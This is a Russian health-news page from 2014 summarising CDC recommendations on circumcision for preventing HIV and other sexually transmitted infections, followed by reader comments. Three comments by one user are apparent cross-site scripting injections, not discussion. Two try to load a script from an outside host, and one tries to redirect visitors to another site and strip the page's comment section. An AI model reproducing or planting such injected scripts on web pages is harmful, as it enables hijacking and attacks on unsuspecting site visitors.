Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Америка за обрезание! А в...  >>  Америка за обрезание! А вы?
 
Обратная связь
 

Америка за обрезание! А вы?

Размер шрифта
17 декабря 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Намедни официальные представители системы здравоохранения США выступили с заявлениями, согласно которым обрезание однозначно рекомендуется как средство профилактики ВИЧ и других заболеваний, передающихся половым путем.

Америка за обрезание! А вы?

Американский Центр по контролю и профилактики заболеваний (CDC) выпустил официальные рекомендации, касающиеся процедуры циркумизации (обрезания). В них черным по белому написано: доктора обязаны консультировать своих пациентов относительно всех преимуществ этой чудесной процедуры.

Авторы не призывают к повальному обрезанию всех новорожденных мальчиков, поскольку это решение может иметь религиозные и культурные аспекты.

«Однако с научной точки зрения совершенно очевидно, что польза перевешивает потенциальный риск», – утверждает доктор Джонатан Мермин, директор одного из подразделений CDC.

Напомним, что обрезание – это операция, в ходе которой удаляется крайняя плоть – кожная складка, покрывающая головку полового члена. Под крайней плотью скапливаются микробы, которые могут привести к развитию некоторых инфекционных заболеваний.

Клинические исследования, многие из которых проводились в жарких странах Африки, продемонстрировали, что обрезание снижает риск ВИЧ-инфекции на 50-60%! Кроме того, значительно уменьшается риск заражения герпесом и вирусом папилломы человека (ВПЧ) – оба этих микроба вызывают рак полового члена.

Авторы рекомендаций подчеркивают, что все эти сведения касаются только профилактики ЗППП для мужчин, занимающихся вагинальным сексом. Пока не доказано позитивное влияние обрезания на инфекционный риск, сопряженный с оральным или анальным сексом. Неоднозначны и данные, касающиеся гомосексуальных мужчин. Одни ученые утверждают, что обрезание в этом случае имеет частичный защитный эффект, другие категорически с этим не согласны.

Стоит иметь в виду, что циркумизация не уменьшает риск развития инфекций мочевыводящих путей у младенцев.

Основными рисками этой процедуры являются кровотечение и инфекция. «Однако частота этих нежелательных эффектов крайне мала – менее 1%!» – утверждает доктор Сьюзан Блэнк, один из авторов рекомендаций. «Потенциальная польза для здоровья от обрезания, вне всяких сомнений, перевешивает этот крайне незначительный риск».

Поэтому мы обращаемся к вам, будущие родители мальчишек! Отбросьте все страхи и предрассудки и не бойтесь обрезания! Это лучшее, что вы можете сделать для здоровья своего богатыря в первые дни его жизни.

Другие статьи о здоровье наших мужчин читайте на страницах одноименного спецпроекта на нашем сайте.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Violensa

19 декабря 2014 в 13:19

Комментарий удален за нарушение Правил общения

2 - Pety1236

21 декабря 2014 в 15:20

Комментарий удален за нарушение Правил общения

3 - Гость

25 декабря 2014 в 10:51

Цитировать   |   Пожаловаться

давайте еще ноги отрежем, а то вдруг упадет

4 - Гость

05 марта 2015 в 21:24

Цитировать   |   Пожаловаться


5 - zzzzzz

30 июня 2015 в 18:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 21:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 22:23

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как научить мужа доставлять вам удовольствие в постели   Playboy отказался от голых девушек! Как порно влияет на мозг   Коротышки лучше высоких мужчин! В чем же?   Стыдные вопросы про секс  
09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить? 26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса!
 
12 декабря 2012Гормон оргазма не дает мужчинам изменять 18 сентября 2012Нет презерватива? Будет рак простаты!
 

Слайдшоу

1
Как остаться сексуальной с болезнью легких
Секреты сексуально удовлетворенных женщин
Почему болит во время секса?

Тесты

1
Здорова ли ваша предстательная железа
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.